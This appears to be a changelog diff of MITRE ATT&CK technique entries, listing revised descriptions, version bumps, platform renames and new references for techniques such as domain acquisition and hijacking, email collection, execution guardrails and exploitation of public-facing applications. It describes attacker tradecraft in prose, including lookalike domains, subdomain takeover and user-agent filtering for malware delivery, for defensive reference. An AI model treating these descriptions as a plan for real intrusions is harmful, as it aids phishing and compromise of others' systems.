modified | 2024-04-28 15:55:55.068000+00:00 | 2024-09-25 15:26:00.047000+00:00 |
description | Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1) | Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024) |
x_mitre_version | 1.3 | 1.4 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
external_references | | {'source_name': 'Invictus IR DangerDev 2024', 'description': 'Invictus Incident Response. (2024, January 31). The curious case of DangerDev@protonmail.me. Retrieved March 19, 2024.', 'url': 'https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me'} |
[T1584.001] Compromise Infrastructure: Domains
Current version: 1.4
Version changed from: 1.3 → 1.4
|
|
t | Adversaries may hijack domains and/or subdomains that can be | t | Adversaries may hijack domains and/or subdomains that can be |
| used during targeting. Domain registration hijacking is the | | used during targeting. Domain registration hijacking is the |
| act of changing the registration of a domain name without t | | act of changing the registration of a domain name without t |
| he permission of the original registrant.(Citation: ICANNDom | | he permission of the original registrant.(Citation: ICANNDom |
| ainNameHijacking) Adversaries may gain access to an email ac | | ainNameHijacking) Adversaries may gain access to an email ac |
| count for the person listed as the owner of the domain. The | | count for the person listed as the owner of the domain. The |
| adversary can then claim that they forgot their password in | | adversary can then claim that they forgot their password in |
| order to make changes to the domain registration. Other poss | | order to make changes to the domain registration. Other poss |
| ibilities include social engineering a domain registration h | | ibilities include social engineering a domain registration h |
| elp desk to gain access to an account or taking advantage of | | elp desk to gain access to an account, taking advantage of r |
| renewal process gaps.(Citation: Krebs DNS Hijack 2019) Sub | | enewal process gaps, or compromising a cloud service that en |
| domain hijacking can occur when organizations have DNS entri | | ables managing domains (e.g., AWS Route53).(Citation: Krebs |
| es that point to non-existent or deprovisioned resources. In | | DNS Hijack 2019) Subdomain hijacking can occur when organiz |
| such cases, an adversary may take control of a subdomain to | | ations have DNS entries that point to non-existent or deprov |
| conduct operations with the benefit of the trust associated | | isioned resources. In such cases, an adversary may take cont |
| with that domain.(Citation: Microsoft Sub Takeover 2020) A | | rol of a subdomain to conduct operations with the benefit of |
| dversaries who compromise a domain may also engage in domain | | the trust associated with that domain.(Citation: Microsoft |
| shadowing by creating malicious subdomains under their cont | | Sub Takeover 2020) Adversaries who compromise a domain may |
| rol while keeping any existing DNS records. As service will | | also engage in domain shadowing by creating malicious subdom |
| not be disrupted, the malicious subdomains may go unnoticed | | ains under their control while keeping any existing DNS reco |
| for long periods of time.(Citation: Palo Alto Unit 42 Domain | | rds. As service will not be disrupted, the malicious subdoma |
| Shadowing 2022) | | ins may go unnoticed for long periods of time.(Citation: Pal |
| | | o Alto Unit 42 Domain Shadowing 2022) |
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-03-07 13:05:42.901000+00:00 | 2024-09-24 15:10:40.270000+00:00 |
description | Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
Adversaries who compromise a domain may also engage in domain shadowing by creating malicious subdomains under their control while keeping any existing DNS records. As service will not be disrupted, the malicious subdomains may go unnoticed for long periods of time.(Citation: Palo Alto Unit 42 Domain Shadowing 2022) | Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: Krebs DNS Hijack 2019)
Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
Adversaries who compromise a domain may also engage in domain shadowing by creating malicious subdomains under their control while keeping any existing DNS records. As service will not be disrupted, the malicious subdomains may go unnoticed for long periods of time.(Citation: Palo Alto Unit 42 Domain Shadowing 2022) |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.3 | 1.4 |
[T1189] Drive-by Compromise
Current version: 1.6
Version changed from: 1.5 → 1.6
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-04-14 23:58:45.490000+00:00 | 2024-10-15 15:55:47.494000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.5 | 1.6 |
x_mitre_platforms[3] | SaaS | Identity Provider |
[T1087.003] Account Discovery: Email Account
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
t | Adversaries may attempt to get a listing of email addresses | t | Adversaries may attempt to get a listing of email addresses |
| and accounts. Adversaries may try to dump Exchange address l | | and accounts. Adversaries may try to dump Exchange address l |
| ists such as global address lists (GALs).(Citation: Microsof | | ists such as global address lists (GALs).(Citation: Microsof |
| t Exchange Address Lists) In on-premises Exchange and Excha | | t Exchange Address Lists) In on-premises Exchange and Excha |
| nge Online, the<code>Get-GlobalAddressList</code> PowerShell | | nge Online, the <code>Get-GlobalAddressList</code> PowerShel |
| cmdlet can be used to obtain email addresses and accounts f | | l cmdlet can be used to obtain email addresses and accounts |
| rom a domain using an authenticated session.(Citation: Micro | | from a domain using an authenticated session.(Citation: Micr |
| soft getglobaladdresslist)(Citation: Black Hills Attacking E | | osoft getglobaladdresslist)(Citation: Black Hills Attacking |
| xchange MailSniper, 2016) In Google Workspace, the GAL is s | | Exchange MailSniper, 2016) In Google Workspace, the GAL is |
| hared with Microsoft Outlook users through the Google Worksp | | shared with Microsoft Outlook users through the Google Works |
| ace Sync for Microsoft Outlook (GWSMO) service. Additionally | | pace Sync for Microsoft Outlook (GWSMO) service. Additionall |
| , the Google Workspace Directory allows for users to get a l | | y, the Google Workspace Directory allows for users to get a |
| isting of other users within the organization.(Citation: Goo | | listing of other users within the organization.(Citation: Go |
| gle Workspace Global Access List) | | ogle Workspace Global Access List) |
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['User'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-03-31 13:10:46.302000+00:00 | 2024-10-17 20:35:35.125000+00:00 |
description | Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
In on-premises Exchange and Exchange Online, theGet-GlobalAddressList PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List) | Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
In on-premises Exchange and Exchange Online, the Get-GlobalAddressList PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List) |
x_mitre_version | 1.1 | 1.2 |
x_mitre_platforms[1] | Office 365 | Office Suite |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Google Workspace | |
[T1114] Email Collection
Current version: 2.6
Version changed from: 2.5 → 2.6
|
|
t | Adversaries may target user email to collect sensitive infor | t | Adversaries may target user email to collect sensitive infor |
| mation. Emails may contain sensitive data, including trade s | | mation. Emails may contain sensitive data, including trade s |
| ecrets or personal information, that can prove valuable to a | | ecrets or personal information, that can prove valuable to a |
| dversaries. Adversaries can collect or forward email from ma | | dversaries. Emails may also contain details of ongoing incid |
| il servers or clients. | | ent response operations, which may allow adversaries to adju |
| | | st their techniques in order to maintain persistence or evad |
| | | e defenses.(Citation: TrustedSec OOB Communications)(Citatio |
| | | n: CISA AA20-352A 2021) Adversaries can collect or forward e |
| | | mail from mail servers or clients. |
New Mitigations:
- M1060: Out-of-Band Communications Channel
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-09-29 21:06:03.098000+00:00 | 2024-10-15 12:24:27.627000+00:00 |
description | Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients. | Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Emails may also contain details of ongoing incident response operations, which may allow adversaries to adjust their techniques in order to maintain persistence or evade defenses.(Citation: TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries can collect or forward email from mail servers or clients. |
x_mitre_version | 2.5 | 2.6 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
external_references | | {'source_name': 'CISA AA20-352A 2021', 'description': 'CISA. (2021, April 15). Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations. Retrieved August 30, 2024.', 'url': 'https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a'} |
external_references | | {'source_name': 'TrustedSec OOB Communications', 'description': 'Tyler Hudak. (2022, December 29). To OOB, or Not to OOB?: Why Out-of-Band Communications are Essential for Incident Response. Retrieved August 30, 2024.', 'url': 'https://trustedsec.com/blog/to-oob-or-not-to-oob-why-out-of-band-communications-are-essential-for-incident-response'} |
x_mitre_contributors | | Menachem Goldstein |
x_mitre_platforms | | Office Suite |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1114.003] Email Collection: Email Forwarding Rule
Current version: 1.4
Version changed from: 1.3 → 1.4
New Mitigations:
- M1060: Out-of-Band Communications Channel
New Detections:
- DS0025: Cloud Service (Cloud Service Metadata)
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-04-12 20:47:47.583000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.3 | 1.4 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_contributors | | Arun Seelagan, CISA |
x_mitre_data_sources | | Cloud Service: Cloud Service Metadata |
x_mitre_platforms | | Office Suite |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1564.008] Hide Artifacts: Email Hiding Rules
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-10-16 16:41:53.957000+00:00 | 2024-10-15 15:56:27.592000+00:00 |
x_mitre_version | 1.3 | 1.4 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | | Office Suite |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1499] Endpoint Denial of Service
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-03-30 21:01:44.038000+00:00 | 2024-10-15 15:56:47.424000+00:00 |
external_references[2]['description'] | FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals Targeting Financial Institution Employee Credentials to Conduct Wire Transfer Fraud. Retrieved April 18, 2019. | FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals Targeting Financial Institution Employee Credentials to Conduct Wire Transfer Fraud. Retrieved September 23, 2024. |
external_references[2]['url'] | https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf | https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
x_mitre_platforms | SaaS | |
x_mitre_platforms | Google Workspace | |
[T1546] Event Triggered Execution
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-03-01 15:49:15.588000+00:00 | 2024-10-15 15:57:00.731000+00:00 |
x_mitre_version | 1.3 | 1.4 |
x_mitre_platforms[5] | Office 365 | Office Suite |
[T1480] Execution Guardrails
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
t | Adversaries may use execution guardrails to constrain execut | t | Adversaries may use execution guardrails to constrain execut |
| ion or actions based on adversary supplied and environment s | | ion or actions based on adversary supplied and environment s |
| pecific conditions that are expected to be present on the ta | | pecific conditions that are expected to be present on the ta |
| rget. Guardrails ensure that a payload only executes against | | rget. Guardrails ensure that a payload only executes against |
| an intended target and reduces collateral damage from an ad | | an intended target and reduces collateral damage from an ad |
| versary’s campaign.(Citation: FireEye Kevin Mandia Guardrail | | versary’s campaign.(Citation: FireEye Kevin Mandia Guardrail |
| s) Values an adversary can provide about a target system or | | s) Values an adversary can provide about a target system or |
| environment to use as guardrails may include specific networ | | environment to use as guardrails may include specific networ |
| k share names, attached physical devices, files, joined Acti | | k share names, attached physical devices, files, joined Acti |
| ve Directory (AD) domains, and local/external IP addresses.( | | ve Directory (AD) domains, and local/external IP addresses.( |
| Citation: FireEye Outlook Dec 2019) Guardrails can be used | | Citation: FireEye Outlook Dec 2019) Guardrails can be used |
| to prevent exposure of capabilities in environments that are | | to prevent exposure of capabilities in environments that are |
| not intended to be compromised or operated within. This use | | not intended to be compromised or operated within. This use |
| of guardrails is distinct from typical [Virtualization/Sand | | of guardrails is distinct from typical [Virtualization/Sand |
| box Evasion](https://attack.mitre.org/techniques/T1497). Whi | | box Evasion](https://attack.mitre.org/techniques/T1497). Whi |
| le use of [Virtualization/Sandbox Evasion](https://attack.mi | | le use of [Virtualization/Sandbox Evasion](https://attack.mi |
| tre.org/techniques/T1497) may involve checking for known san | | tre.org/techniques/T1497) may involve checking for known san |
| dbox values and continuing with execution only if there is n | | dbox values and continuing with execution only if there is n |
| o match, the use of guardrails will involve checking for an | | o match, the use of guardrails will involve checking for an |
| expected target-specific value and only continuing with exec | | expected target-specific value and only continuing with exec |
| ution if there is such a match. | | ution if there is such a match. Adversaries may identify an |
| | | d block certain user-agents to evade defenses and narrow the |
| | | scope of their attack to victims and platforms on which it |
| | | will be most effective. A user-agent self-identifies data su |
| | | ch as a user's software application, operating system, vendo |
| | | r, and version. Adversaries may check user-agents for operat |
| | | ing system identification and then only serve malware for th |
| | | e exploitable software while ignoring all other operating sy |
| | | stems.(Citation: Trellix-Qakbot) |
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-05-03 02:39:29.314000+00:00 | 2024-06-07 14:30:23.491000+00:00 |
description | Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match. | Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot) |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
external_references | | {'source_name': 'Trellix-Qakbot', 'description': 'Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware Distribution. Retrieved June 7, 2024.', 'url': 'https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/'} |
[T1048] Exfiltration Over Alternative Protocol
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_network_requirements | False | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-04-15 00:58:36.287000+00:00 | 2024-10-15 15:57:26.415000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.4 | 1.5 |
x_mitre_platforms[6] | Google Workspace | Office Suite |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Office 365 | |
[T1567] Exfiltration Over Web Service
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-09-05 15:00:36.471000+00:00 | 2024-10-15 15:57:40.951000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.3 | 1.4 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | | Office Suite |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1567.004] Exfiltration Over Web Service: Exfiltration Over Webhook
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-10-12 05:22:59.079000+00:00 | 2024-10-15 15:57:55.928000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[4] | Office 365 | Office Suite |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Google Workspace | |
[T1190] Exploit Public-Facing Application
Current version: 2.6
Version changed from: 2.5 → 2.6
|
|
t | Adversaries may attempt to exploit a weakness in an Internet | t | Adversaries may attempt to exploit a weakness in an Internet |
| -facing host or system to initially access a network. The we | | -facing host or system to initially access a network. The we |
| akness in the system can be a software bug, a temporary glit | | akness in the system can be a software bug, a temporary glit |
| ch, or a misconfiguration. Exploited applications are often | | ch, or a misconfiguration. Exploited applications are often |
| websites/web servers, but can also include databases (like | | websites/web servers, but can also include databases (like |
| SQL), standard services (like SMB or SSH), network device ad | | SQL), standard services (like SMB or SSH), network device ad |
| ministration and management protocols (like SNMP and Smart I | | ministration and management protocols (like SNMP and Smart I |
| nstall), and any other system with Internet accessible open | | nstall), and any other system with Internet-accessible open |
| sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple | | sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple |
| SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network In | | SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network In |
| frastructure Devices 2018)(Citation: Cisco Blog Legacy Devic | | frastructure Devices 2018)(Citation: Cisco Blog Legacy Devic |
| e Attacks)(Citation: NVD CVE-2014-7169) Depending on the fla | | e Attacks)(Citation: NVD CVE-2014-7169) Depending on the fla |
| w being exploited this may also involve [Exploitation for De | | w being exploited this may also involve [Exploitation for De |
| fense Evasion](https://attack.mitre.org/techniques/T1211) or | | fense Evasion](https://attack.mitre.org/techniques/T1211) or |
| [Exploitation for Client Execution](https://attack.mitre.or | | [Exploitation for Client Execution](https://attack.mitre.or |
| g/techniques/T1203). If an application is hosted on cloud-b | | g/techniques/T1203). If an application is hosted on cloud-b |
| ased infrastructure and/or is containerized, then exploiting | | ased infrastructure and/or is containerized, then exploiting |
| it may lead to compromise of the underlying instance or con | | it may lead to compromise of the underlying instance or con |
| tainer. This can allow an adversary a path to access the clo | | tainer. This can allow an adversary a path to access the clo |
| ud or container APIs, exploit container host access via [Esc | | ud or container APIs (e.g., via the [Cloud Instance Metadata |
| ape to Host](https://attack.mitre.org/techniques/T1611), or | | API](https://attack.mitre.org/techniques/T1552/005)), explo |
| take advantage of weak identity and access management polici | | it container host access via [Escape to Host](https://attack |
| es. Adversaries may also exploit edge network infrastructur | | .mitre.org/techniques/T1611), or take advantage of weak iden |
| e and related appliances, specifically targeting devices tha | | tity and access management policies. Adversaries may also e |
| t do not support robust host-based defenses.(Citation: Mandi | | xploit edge network infrastructure and related appliances, s |
| ant Fortinet Zero Day)(Citation: Wired Russia Cyberwar) For | | pecifically targeting devices that do not support robust hos |
| websites and databases, the OWASP top 10 and CWE top 25 hig | | t-based defenses.(Citation: Mandiant Fortinet Zero Day)(Cita |
| hlight the most common web-based vulnerabilities.(Citation: | | tion: Wired Russia Cyberwar) For websites and databases, th |
| OWASP Top 10)(Citation: CWE top 25) | | e OWASP top 10 and CWE top 25 highlight the most common web- |
| | | based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE |
| | | top 25) |
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-11-28 21:27:35.373000+00:00 | 2024-09-24 14:33:53.433000+00:00 |
description | Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25) | Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25) |
x_mitre_version | 2.5 | 2.6 |
[T1212] Exploitation for Credential Access
Current version: 1.6
Version changed from: 1.5 → 1.6
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-10-15 11:45:21.555000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
external_references[5]['description'] | Microsoft Threat Intelligence. (2023, June 21). Credential Attacks. Retrieved September 27, 2023. | Microsoft Threat Intelligence. (2023, June 21). Credential Attacks. Retrieved September 12, 2024. |
external_references[5]['url'] | https://twitter.com/MsftSecIntel/status/1671579359994343425 | https://x.com/MsftSecIntel/status/1671579359994343425 |
x_mitre_version | 1.5 | 1.6 |
x_mitre_platforms[3] | Azure AD | Identity Provider |
[T1657] Financial Theft
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-04-11 20:22:14.359000+00:00 | 2024-10-15 15:58:10.254000+00:00 |
x_mitre_version | 1.1 | 1.2 |
x_mitre_contributors[2] | Goldstein Menachem | Menachem Goldstein |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | | Office Suite |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Office 365 | |
